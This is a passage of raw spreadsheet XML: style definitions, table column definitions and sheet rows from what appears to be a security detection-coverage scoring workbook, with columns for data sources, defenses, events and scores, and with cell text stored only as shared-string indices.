    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="0" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top"/>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3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="1" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="164" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="7" fillId="4" borderId="1" xfId="1" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="12" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left"/>
    </xf>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
    <cellStyle name="Rated" xfId="1" xr:uid="{00000000-0005-0000-0000-000001000000}"/>
  </cellStyles>
  <dxfs count="58">
    <dxf>
      <alignment horizontal="center" vertical="center" textRotation="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color theme="4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="left"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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B3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border diagonalUp="0" diagonalDown="0">
        <right style="thin">
          <color indexed="64"/>
        </right>
        <top/>
        <bottom/>
        <vertical/>
        <horizontal/>
      </border>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border outline="0">
        <top style="thin">
          <color rgb="FF4472C4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor rgb="FF000000"/>
          <bgColor rgb="FFFFFFFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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border outline="0">
        <top style="thin">
          <color rgb="FF4472C4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor rgb="FF000000"/>
          <bgColor rgb="FFFFFFFF"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor indexed="65"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <border outline="0">
        <top style="thin">
          <color theme="4"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="1"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <fill>
        <patternFill patternType="none">
          <fgColor indexed="64"/>
          <bgColor indexed="65"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <strike val="0"/>
        <condense val="0"/>
        <extend val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="11"/>
        <color theme="0"/>
        <name val="Consolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="0" formatCode="General"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="general"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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B3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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B3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onsolas"/>
        <scheme val="none"/>
      </font>
      <numFmt numFmtId="1" formatCode="0"/>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor rgb="FF0C1B33"/>
        </patternFill>
      </fill>
      <alignment horizontal="center" vertical="bottom" textRotation="0" wrapText="0" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
  </dxfs>
  <tableStyles count="0" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16"/>
  <colors>
    <mruColors>
      <color rgb="FF0C1B33"/>
      <color rgb="FF2C578C"/>
      <color rgb="FF1F3F64"/>
      <color rgb="FF76AA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048576" totalsRowShown="0" headerRowDxfId="57" dataDxfId="56">
  <autoFilter ref="A1:F1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F431">
    <sortCondition ref="A115"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="DataSource"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Event"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Completeness" dataDxfId="55"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Timeliness" dataDxfId="54"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Availability" dataDxfId="53"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Score" dataDxfId="52"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1"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5532A2-843C-47DF-8608-1466651A1023}" name="Table14" displayName="Table14" ref="A1:I1048576" totalsRowShown="0" headerRowDxfId="51" dataDxfId="50">
  <autoFilter ref="A1:I1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{5A8720A1-C4EB-4D0F-9A10-2011CE69087A}" name="ID"/>
    <tableColumn id="2" xr3:uid="{1E99F361-759C-4633-BACD-3FFC8CED1432}" name="Name"/>
    <tableColumn id="9" xr3:uid="{E928A876-2831-406D-8E43-A73A9528B778}" name="Use case"/>
    <tableColumn id="7" xr3:uid="{19D66E15-B044-46E3-83C4-CA08ED9B9AEC}" name="Data source(s) used"/>
    <tableColumn id="8" xr3:uid="{A3F96FA2-6DB9-42F4-9011-DF134312E2B0}" name="Data score"/>
    <tableColumn id="3" xr3:uid="{7EE17FA3-339C-434B-97E1-23CD4A5A9E21}" name="Coverage" dataDxfId="49"/>
    <tableColumn id="4" xr3:uid="{17304CFF-50C1-4FEB-99C2-32C5EE0ECAED}" name="Upkeep" dataDxfId="48"/>
    <tableColumn id="5" xr3:uid="{8635D406-78FF-4BE8-B4BD-48C37E937BD2}" name="Confidence" dataDxfId="47"/>
    <tableColumn id="6" xr3:uid="{3C661D09-CA29-4A4B-B230-56DCCFA19FF2}" name="Score" dataDxfId="46"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1"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89868F-CFDF-4D5D-A585-261BD5FB0287}" name="Table146" displayName="Table146" ref="A1:F1048576" totalsRowShown="0" headerRowDxfId="45" dataDxfId="44">
  <autoFilter ref="A1:F1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F431">
    <sortCondition ref="A2"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="2" xr3:uid="{8AB82587-94D4-4AA1-9FB6-31106CE4302C}" name="Defense"/>
    <tableColumn id="7" xr3:uid="{EDE90456-9684-4217-8A11-A405B9599223}" name="Rationale"/>
    <tableColumn id="3" xr3:uid="{19AE8B58-514C-404B-A8CD-B45DACA75EC5}" name="Coverage" dataDxfId="43"/>
    <tableColumn id="4" xr3:uid="{DFBFDEDA-4648-4B35-A108-AFF953BE19D6}" name="Maintainability" dataDxfId="42"/>
    <tableColumn id="5" xr3:uid="{84BB3A79-F357-43BB-970F-876AE111E776}" name="Confidence" dataDxfId="41"/>
    <tableColumn id="6" xr3:uid="{81F9B949-1125-4DD9-944D-CC65168A336D}" name="Score" dataDxfId="40"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1"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G599" totalsRowShown="0" headerRowDxfId="39" dataDxfId="38" tableBorderDxfId="37">
  <autoFilter ref="A1:G599" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0200-000001000000}" name="ID" dataDxfId="36"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0200-000002000000}" name="Data Source" dataDxfId="35"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0200-000003000000}" name="Weight" dataDxfId="34"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0200-000004000000}" name="Datasources" dataDxfId="33"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0200-000005000000}" name="Weights" dataDxfId="32"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0200-000006000000}" name=" " dataDxfId="31"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0200-000007000000}" name="Items in Refence vs Items in this sheet" dataDxfId="30"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="0" showLastColumn="0" showRowStripes="1"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CCB65E-2C54-5545-AA30-1154A22B876C}" name="Table48" displayName="Table48" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="29" dataDxfId="28" tableBorderDxfId="27">
  <autoFilter ref="A1:G1048576" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{02562021-0EBD-CC44-A120-6DDC902112D6}" name="ID" dataDxfId="26"/>
    <tableColumn id="2" xr3:uid="{E4FA407A-D868-5948-A86A-3E7C21459D22}" name="Data Source" dataDxfId="25"/>
    <tableColumn id="3" xr3:uid="{133E9531-97AF-AE46-9810-F86F5EDF1B4E}" name="Weight" dataDxfId="24"/>
    <tableColumn id="4" xr3:uid="{88548EC0-A39A-D644-89DB-109E9E72A752}" name="Datasources" dataDxfId="23"/>
    <tableColumn id="5" xr3:uid="{31F6B13E-093D-7148-82A3-73E841D209D9}" name="Weights" dataDxfId="22"/>
    <tableColumn id="6" xr3:uid="{20D93E48-3636-8E44-826B-E16EA3C44275}" name=" " dataDxfId="21"/>
    <tableColumn id="7" xr3:uid="{6C0A5336-E287-5A44-AA9C-78123FDB5740}" name="Items in Refence vs Items in this sheet" dataDxfId="20"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="0" showLastColumn="0" showRowStripes="1"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8F8F007-C03B-4FBB-B311-98A235E66082}" name="Table47" displayName="Table47" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="19" dataDxfId="18" tableBorderDxfId="17">
  <autoFilter ref="A1:G1048576" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{95C2B4CB-8944-46C1-A8C8-7A0515F45D8C}" name="ID" dataDxfId="16"/>
    <tableColumn id="2" xr3:uid="{5F2F7F9F-839F-4CD8-8D50-D885AE10D42F}" name="Defense Bypassed" dataDxfId="15"/>
    <tableColumn id="3" xr3:uid="{2B56273F-EC15-4C41-9D11-A1D8408F30ED}" name="Weight" dataDxfId="14"/>
    <tableColumn id="4" xr3:uid="{8C8D49D6-D39D-4C99-BB1E-440A8282C9F0}" name="Datasources" dataDxfId="13"/>
    <tableColumn id="5" xr3:uid="{18B33E85-082C-4981-9E2B-9D50609487B9}" name="Weights" dataDxfId="12"/>
    <tableColumn id="6" xr3:uid="{9CEA5C68-2610-49D7-BB50-F591E746B86B}" name=" " dataDxfId="11"/>
    <tableColumn id="7" xr3:uid="{F2F9713F-9D15-46A4-B360-30E30FB09F2D}" name="Items in Refence vs Items in this sheet" dataDxfId="10"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="0" showLastColumn="0" showRowStripes="1"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D3787E-1F44-485A-A8A9-8A85D79BF754}" name="Table149" displayName="Table149" ref="A1:G1048576" totalsRowShown="0" headerRowDxfId="9" dataDxfId="8">
  <autoFilter ref="A1:G1048576" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
  <tableColumns count="7">
    <tableColumn id="1" xr3:uid="{E48BB814-60C2-4871-BAD1-E759BECD6686}" name="ID"/>
    <tableColumn id="2" xr3:uid="{11631B41-4E72-45BA-8ECA-AF9793FAE537}" name="Name"/>
    <tableColumn id="8" xr3:uid="{F4727FDB-BF23-417C-B827-D6E18D705A68}" name="Data score" dataDxfId="7">
      <calculatedColumnFormula>LOOKUP(A2,'REF-DataSources'!A:C)</calculatedColumnFormula>
    </tableColumn>
    <tableColumn id="3" xr3:uid="{2026F669-B4E9-4263-8D48-D471D5FF0485}" name="Alerting" dataDxfId="6"/>
    <tableColumn id="4" xr3:uid="{55925F3A-D5C3-4914-BF47-8534DE4D940C}" name="Hunting" dataDxfId="5"/>
    <tableColumn id="5" xr3:uid="{D3B86A9C-223C-4BF7-A7B4-F9FFDDD583C3}" name="Forensics" dataDxfId="4"/>
    <tableColumn id="6" xr3:uid="{6134569F-8BFE-4B2D-8876-B96C7F7D78C4}" name="Score" dataDxfId="3"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1" showLastColumn="1" showRowStripes="1"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E1048575" totalsRowShown="0" headerRowDxfId="2" tableBorderDxfId="1">
  <autoFilter ref="A1:E1048575" xr:uid="{00000000-0009-0000-0100-000002000000}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:E198">
    <sortCondition ref="A1:A1048575"/>
  </sortState>
  <tableColumns count="5">
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0100-000002000000}" name="EventID" dataDxfId="0"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0100-000003000000}" name="Event Description"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0100-000004000000}" name="Log Name"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0100-000005000000}" name="Verbosity Signal"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0100-000006000000}" name="Detection Relevance"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleLight9" showFirstColumn="1"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13"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B6" sqref="B6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="22.6640625" customWidth="1"/>
    <col min="2" max="2" width="27.33203125" customWidth="1"/>
    <col min="3" max="3" width="141.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="24.75" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="27" t="s">
        <v>2894</v>
      </c>
      <c r="B1" s="7"/>
      <c r="C1" s="7"/>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A2" s="21"/>
      <c r="B2" s="21"/>
      <c r="C2" s="21"/>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="16" t="s">
        <v>2895</v>
      </c>
      <c r="B3" s="16"/>
      <c r="C3" s="16"/>
    </row>
    <row r="4" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A4" s="22" t="s">
        <v>2896</v>
      </c>
      <c r="B4" s="20" t="s">
        <v>2897</v>
      </c>
      <c r="C4" s="23" t="s">
        <v>2898</v>
      </c>
    </row>
    <row r="5" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A5" s="22" t="s">
        <v>2899</v>
      </c>
      <c r="B5" s="20" t="s">
        <v>2897</v>
      </c>
      <c r="C5" s="20" t="s">
        <v>2900</v>
      </c>
    </row>
    <row r="6" spans="1:3" ht="27" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A6" s="22" t="s">
        <v>2901</v>
      </c>
      <c r="B6" s="20" t="s">
        <v>2897</v>
      </c>
      <c r="C6" s="20" t="s">
        <v>2902</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A7" s="22"/>
      <c r="B7" s="20"/>
      <c r="C7" s="20"/>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A8" s="16" t="s">
        <v>2903</v>
      </c>
      <c r="B8" s="16"/>
      <c r="C8" s="16"/>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A9" s="22" t="s">
        <v>39</v>
      </c>
      <c r="B9" s="20" t="s">
        <v>2904</v>
      </c>
      <c r="C9" s="20" t="s">
        <v>2905</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A10" s="20"/>
      <c r="B10" s="20"/>
      <c r="C10" s="20" t="s">
        <v>2906</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A11" s="8"/>
      <c r="B11" s="8"/>
      <c r="C11" s="8"/>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A12" s="8"/>
      <c r="B12" s="8"/>
      <c r="C12" s="8"/>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A13" s="8"/>
      <c r="B13" s="8"/>
      <c r="C13" s="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569"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A2" sqref="A2:A569"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="9.1640625" defaultRowHeight="12" x14ac:dyDescent="0.15"/>
  <cols>
    <col min="1" max="1" width="9.1640625" style="13" customWidth="1"/>
    <col min="2" max="2" width="54.6640625" style="13" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="124" style="13" customWidth="1"/>
    <col min="4" max="4" width="25.5" style="13" customWidth="1"/>
    <col min="5" max="5" width="99.83203125" style="13" customWidth="1"/>
    <col min="6" max="6" width="50.33203125" style="13" customWidth="1"/>
    <col min="7" max="7" width="40.83203125" style="13" customWidth="1"/>
    <col min="8" max="12" width="9.1640625" style="13" customWidth="1"/>
    <col min="13" max="16384" width="9.1640625" style="13"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A1" s="53" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="53" t="s">
        <v>406</v>
      </c>
      <c r="C1" s="53" t="s">
        <v>38</v>
      </c>
      <c r="D1" s="53" t="s">
        <v>529</v>
      </c>
      <c r="E1" s="53" t="s">
        <v>530</v>
      </c>
      <c r="F1" s="53" t="s">
        <v>531</v>
      </c>
      <c r="G1" s="53" t="s">
        <v>532</v>
      </c>
      <c r="H1" s="53" t="s">
        <v>400</v>
      </c>
    </row>
    <row r="2" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A2" s="53" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="53" t="s">
        <v>533</v>
      </c>
      <c r="C2" s="53" t="s">
        <v>534</v>
      </c>
      <c r="D2" s="53" t="s">
        <v>535</v>
      </c>
      <c r="E2" s="53" t="s">
        <v>536</v>
      </c>
      <c r="F2" s="53" t="s">
        <v>537</v>
      </c>
      <c r="G2" s="53" t="s">
        <v>538</v>
      </c>
      <c r="H2" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="3" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A3" s="53" t="s">
        <v>540</v>
      </c>
      <c r="B3" s="53" t="s">
        <v>541</v>
      </c>
      <c r="C3" s="53" t="s">
        <v>534</v>
      </c>
      <c r="D3" s="53" t="s">
        <v>535</v>
      </c>
      <c r="E3" s="53" t="s">
        <v>542</v>
      </c>
      <c r="F3" s="53" t="s">
        <v>543</v>
      </c>
      <c r="G3" s="53" t="s">
        <v>538</v>
      </c>
      <c r="H3" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="4" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A4" s="53" t="s">
        <v>544</v>
      </c>
      <c r="B4" s="53" t="s">
        <v>545</v>
      </c>
      <c r="C4" s="53" t="s">
        <v>534</v>
      </c>
      <c r="D4" s="53" t="s">
        <v>535</v>
      </c>
      <c r="E4" s="53" t="s">
        <v>542</v>
      </c>
      <c r="F4" s="53" t="s">
        <v>546</v>
      </c>
      <c r="G4" s="53" t="s">
        <v>538</v>
      </c>
      <c r="H4" s="53" t="s">
        <v>539</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.15">
      <c r="A5" s="53" t="s">
